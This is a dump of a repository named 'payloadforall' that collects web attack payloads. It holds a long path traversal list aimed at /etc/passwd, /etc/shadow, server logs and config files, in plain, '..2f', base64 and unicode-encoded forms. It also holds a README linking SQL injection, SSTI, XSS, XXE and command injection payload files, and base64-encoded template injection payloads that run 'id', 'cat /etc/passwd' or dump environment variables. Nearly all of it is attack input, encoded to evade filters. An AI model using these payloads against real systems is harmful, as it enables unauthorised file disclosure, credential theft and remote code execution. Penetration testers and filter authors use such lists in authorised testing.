/var/log/proftpd.access_log 723 | /var/log/proftpd.xferlog 724 | /var/log/proftpd/xferlog.legacy 725 | /var/log/pureftpd.log 726 | /var/log/pure-ftpd/pure-ftpd.log 727 | /var/log/qmail 728 | /var/log/qmail/ 729 | /var/log/samba 730 | /var/log/samba-log.%m 731 | /var/log/secure 732 | /var/log/smtpd 733 | /var/log/spooler 734 | /var/log/syslog 735 | /var/log/telnetd 736 | /var/log/thttpd_log 737 | /var/log/utmp 738 | /var/log/vsftpd.log 739 | /var/log/wtmp 740 | /var/log/xferlog 741 | /var/log/yum.log 742 | /var/lp/logs/lpNet 743 | /var/lp/logs/lpsched 744 | /var/lp/logs/requests 745 | /var/mysql.log 746 | /var/run/httpd.pid 747 | /var/run/mysqld/mysqld.pid 748 | /var/run/utmp 749 | /var/saf/_log 750 | /var/saf/port/log 751 | /var/spool/errors 752 | /var/spool/locks 753 | /var/spool/logs 754 | /var/spool/tmp 755 | /var/www/conf/httpd.conf 756 | /var/www/html/.htaccess 757 | /var/www/localhost/htdocs/.htaccess 758 | /var/www/log/access_log 759 | /var/www/log/error_log 760 | /../../var/www/logs/access_log 761 | /var/www/logs/access_log 762 | /var/www/logs/access.log 763 | ../../../../../../../var/www/logs/access_log 764 | ../../../../../../../var/www/logs/access.log 765 | ../../../../../var/www/logs/access.log 766 | /var/www/logs/error_log 767 | /var/www/logs/error.log 768 | ../../../../../../../var/www/logs/error_log 769 | ../../../../../../../var/www/logs/error.log 770 | ../../../../../var/www/logs/error_log 771 | ../../../../../var/www/logs/error.log 772 | /var/www/sitename/htdocs/ 773 | /var/www/vhosts/sitename/httpdocs/.htaccess 774 | /var/www/web1/html/.htaccess 775 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf 776 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf 777 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 778 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php 779 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php 780 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php 781 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini 782 | /Volumes/webBackup/opt/apache2/conf/httpd.conf 783 | /Volumes/webBackup/private/etc/httpd/httpd.conf 784 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default 785 | /web/conf/php.ini 786 | /WINDOWS\php.ini 787 | ../../windows/win.ini 788 | ../../../../../../../../windows/win.ini 789 | ..\..\..\..\..\..\..\..\windows\win.ini 790 | /WINNT\php.ini 791 | /..\..\..\..\..\..\winnt\win.ini 792 | /www/logs/proftpd.system.log 793 | /xampp\apache\bin\php.ini 794 | /.Xauthority 795 | ..2fapache2flogs2ferror.log 796 | ..2fapache2flogs2faccess.log 797 | ..2f..2fapache2flogs2ferror.log 798 | ..2f..2fapache2flogs2faccess.log 799 | ..2f..2f..2fapache2flogs2ferror.log 800 | ..2f..2f..2fapache2flogs2faccess.log 801 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log 802 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log 803 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log 804 | ..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log 805 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log 806 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log 807 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log 808 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log 809 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log 810 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log 811 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log 812 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log 813 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log 814 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log 815 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log 816 | ..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log 817 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og 818 | ..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og 819 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log 820 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log 821 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log 822 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log 823 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log 824 | ..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log 825 | ..2fetc2fpasswd 826 | ..2fetc2fpasswd%00 827 | ..2f..2fetc2fpasswd 828 | ..2f..2fetc2fpasswd%00 829 | ..2f..2f..2fetc2fpasswd 830 | ..2f..2f..2fetc2fpasswd%00 831 | ..2f..2f..2f..2fetc2fpasswd 832 | ..2f..2f..2f..2fetc2fpasswd%00 833 | ..2f..2f..2f..2f..2fetc2fpasswd 834 | ..2f..2f..2f..2f..2fetc2fpasswd%00 835 | ..2f..2f..2f..2f..2f..2fetc2fpasswd 836 | ..2f..2f..2f..2f..2f..2fetc2fpasswd%00 837 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 838 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 839 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 840 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 841 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 842 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 843 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 844 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 845 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 846 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 847 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 848 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 849 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 850 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 851 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 852 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 853 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 854 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 855 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 856 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 857 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 858 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 859 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 860 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 861 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 862 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 863 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 864 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 865 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 866 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 867 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 868 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 869 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 870 | L2V0Yy9tYXN0ZXIucGFzc3dk 871 | L21hc3Rlci5wYXNzd2Q= 872 | ZXRjL3Bhc3N3ZA== 873 | ZXRjL3NoYWRvdyUwMA== 874 | L2V0Yy9wYXNzd2Q= 875 | L2V0Yy9wYXNzd2QlMDA= 876 | Li4vZXRjL3Bhc3N3ZA== 877 | Li4vZXRjL3Bhc3N3ZCUwMA== 878 | Li4vLi4vZXRjL3Bhc3N3ZA== 879 | Li4vLi4vZXRjL3Bhc3N3ZCUwMA== 880 | Li4vLi4vLi4vZXRjL3Bhc3N3ZA== 881 | Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 882 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 883 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 884 | Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 885 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 886 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 887 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 888 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 889 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 890 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 891 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 892 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 893 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 894 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 895 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 896 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 897 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 898 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 899 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 900 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 901 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 902 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 903 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 904 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 905 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 906 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 907 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 908 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 909 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 910 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 911 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 912 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 913 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 914 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 915 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 916 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 917 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 918 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 919 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== 920 | %e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be 921 | ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd 922 | %e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0 923 | ..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini 924 | ..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini 925 | ///////../../../etc/passwd 926 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # payloadforall 2 | 3 | This repo conatin a lot of payload with some encoding operation (url,base64,hex,unicode) 4 | ### Sql injection payloads 5 | 1. [basic payloads](https://github.com/Az0x7/payloadforall/blob/main/Sql%20injection/SQL%20payload%20.txt) 2. [url_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/Sql%20injection/url_encoded.txt) 3. [hex_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/Sql%20injection/hex_encoded.txt) 4. [base64_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/Sql%20injection/base64_encoded.txt) 5. [unicode_encoded](https://github.com/Az0x7/payloadforall/blob/main/Sql%20injection/unicode_encoded.txt) 6 | 7 | ### SSTI payloads 8 | 1. [basic payloads](https://github.com/Az0x7/payloadforall/blob/main/SSTI/ssti.txt) 2. [url_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/SSTI/url_encoded.txt) 3. [hex_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/SSTI/hex_encoded.txt) 4. [base64_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/SSTI/base64_encoded.txt) 5. [unicode_encoded](https://github.com/Az0x7/payloadforall/blob/main/SSTI/unicode_encoded.txt) 9 | 10 | ### XSS payloads 11 | 1. [basic payloads](https://github.com/Az0x7/payloadforall/blob/main/XSS/xss.txt) 2. [url_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/XSS/url_encoded.txt) 3. [hex_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/XSS/hex_encoded.txt) 4. [base64_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/XSS/base64_encoded.txt) 5. [unicode_encoded](https://github.com/Az0x7/payloadforall/blob/main/XSS/unicode_encoded.txt) 12 | 13 | ### XXE injection payloads 14 | 1. [basic payloads](https://github.com/Az0x7/payloadforall/blob/main/XXE/xxe.txt) 2. [url_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/XXE/url_encoded.txt) 3. [hex_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/XXE/hex_encoded.txt) 4. [base64_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/XXE/base64_encoded.txt) 5. [unicode_encoded](https://github.com/Az0x7/payloadforall/blob/main/XXE/unicode_encoded.txt) 15 | 16 | ### command injection payloads 17 | 1. [basic payloads](https://github.com/Az0x7/payloadforall/blob/main/Command%20injection/command_injection.txt) 2. [url_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/Command%20injection/url_encoded.txt) 3. [hex_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/Command%20injection/hex_encoded.txt) 4. [base64_encoded payloads](https://github.com/Az0x7/payloadforall/blob/main/Command%20injection/base64_encoded.txt) 5. [unicode_encoded](https://github.com/Az0x7/payloadforall/blob/main/Command%20injection/unicode_encoded.txt) 18 | -------------------------------------------------------------------------------- /SSTI/base64_encoded.txt: -------------------------------------------------------------------------------- 1 | I3sgMyAqIDMgfQ== 2 | I3sgNyAqIDcgfQ== 3 | I3szKjN9 4 | I3s0Mio0Mn0= 5 | I3s3Kjd9 6 | JHsiZnJlZW1hcmtlci50ZW1wbGF0ZS51dGlsaXR5LkV4ZWN1dGUiP25ldygpKCJpZCIpfQ== 7 | JHszKjN9 8 | JHs0Mio0Mn0= 9 | JHs2KjZ9 10 | JHs3Kjd9 11 | JHtUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYygnY2F0IGV0Yy9wYXNzd2QnKX0= 12 | JHtUKGphdmEubGFuZy5TeXN0ZW0pLmdldGVudigpfQ== 13 | JHtUKG9yZy5hcGFjaGUuY29tbW9ucy5pby5JT1V0aWxzKS50b1N0cmluZyhUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYyhUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDk5KS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZyg5NykpLmNvbmNhdChUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDExNikpLmNvbmNhdChUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDMyKSkuY29uY2F0KFQoamF2YS5sYW5nLkNoYXJhY3RlcikudG9TdHJpbmcoNDcpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMDEpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTYpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZyg5OSkpLmNvbmNhdChUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDQ3KSkuY29uY2F0KFQoamF2YS5sYW5nLkNoYXJhY3RlcikudG9TdHJpbmcoMTEyKSkuY29uY2F0KFQoamF2YS5sYW5nLkNoYXJhY3RlcikudG9TdHJpbmcoOTcpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTUpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTUpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTkpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMDApKSkuZ2V0SW5wdXRTdHJlYW0oKSl9 14 | JHtUKG9yZy5hcGFjaGUuY29tbW9ucy5pby5JT1V0aWxzKS50b1N0cmluZyhUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYyhUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDk5KS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZyg5NykpLmNvbmNhdChUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDExNikpLmNvbmNhdChUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDMyKSkuY29uY2F0KFQoamF2YS5sYW5nLkNoYXJhY3RlcikudG9TdHJpbmcoNDcpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMDEpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTYpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZyg5OSkpLmNvbmNhdChUKGphdmEubGFuZy5DaGFyYWN0ZXIpLnRvU3RyaW5nKDQ3KSkuY29uY2F0KFQoamF2YS5sYW5nLkNoYXJhY3RlcikudG9TdHJpbmcoMTEyKSkuY29uY2F0KFQoamF2YS5sYW5nLkNoYXJhY3RlcikudG9TdHJpbmcoOTcpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTUpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTUpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMTkpKS5jb25jYXQoVChqYXZhLmxhbmcuQ2hhcmFjdGVyKS50b1N0cmluZygxMDApKSkuZ2V0SW5wdXRTdHJlYW0oKSl9JHtzZWxmLm1vZHVsZS5jYWNoZS51dGlsLm9zLnN5c3RlbSgiaWQiKX0= 15 | JHtkb25vdGV4aXN0c3w0Mio0Mn0= 16 | JHtzZWxmLl9faW5pdF9fLl9fZ2xvYmFsc19fWyd1dGlsJ10ub3Muc3lzdGVtKCdpZCcpfQ== 17 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50Lm1vZHVsZS5jYWNoZS5jb21wYXQuaW5zcGVjdC5vcy5zeXN0ZW0oImlkIil9 18 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50Lm1vZHVsZS5jYWNoZS51dGlsLm9zLnN5c3RlbSgiaWQiKX0= 19 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50Lm1vZHVsZS5maWx0ZXJzLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 20 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50Lm1vZHVsZS5ydW50aW1lLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 21 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50Lm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudXRpbC5vcy5zeXN0ZW0oImlkIil9 22 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50Lm1vZHVsZS5ydW50aW1lLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 23 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50LnRlbXBsYXRlLm1vZHVsZS5jYWNoZS51dGlsLm9zLnN5c3RlbSgiaWQiKX0= 24 | JHtzZWxmLmF0dHIuX05TQXR0cl9fcGFyZW50LnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 25 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUuX21tYXJrZXIubW9kdWxlLmNhY2hlLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 26 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUuX21tYXJrZXIubW9kdWxlLnJ1bnRpbWUudXRpbC5vcy5zeXN0ZW0oImlkIil9 27 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUubW9kdWxlLmNhY2hlLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 28 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUubW9kdWxlLmNhY2hlLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 29 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUubW9kdWxlLmZpbHRlcnMuY29tcGF0Lmluc3BlY3Qub3Muc3lzdGVtKCJpZCIpfQ== 30 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUubW9kdWxlLnJ1bnRpbWUuY29tcGF0Lmluc3BlY3Qub3Muc3lzdGVtKCJpZCIpfQ== 31 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUubW9kdWxlLnJ1bnRpbWUuZXhjZXB0aW9ucy51dGlsLm9zLnN5c3RlbSgiaWQiKX0= 32 | JHtzZWxmLmNvbnRleHQuX3dpdGhfdGVtcGxhdGUubW9kdWxlLnJ1bnRpbWUudXRpbC5vcy5zeXN0ZW0oImlkIil9 33 | JHtzZWxmLm1vZHVsZS5jYWNoZS5jb21wYXQuaW5zcGVjdC5saW5lY2FjaGUub3Muc3lzdGVtKCJpZCIpfQ== 34 | JHtzZWxmLm1vZHVsZS5jYWNoZS5jb21wYXQuaW5zcGVjdC5vcy5zeXN0ZW0oImlkIil9 35 | JHtzZWxmLm1vZHVsZS5jYWNoZS51dGlsLmNvbXBhdC5pbnNwZWN0LmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 36 | JHtzZWxmLm1vZHVsZS5jYWNoZS51dGlsLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 37 | JHtzZWxmLm1vZHVsZS5maWx0ZXJzLmNvbXBhdC5pbnNwZWN0LmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 38 | JHtzZWxmLm1vZHVsZS5maWx0ZXJzLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 39 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLmNvbXBhdC5pbnNwZWN0LmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 40 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 41 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMuY29tcGF0Lmluc3BlY3QubGluZWNhY2hlLm9zLnN5c3RlbSgiaWQiKX0= 42 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMuY29tcGF0Lmluc3BlY3Qub3Muc3lzdGVtKCJpZCIpfQ== 43 | 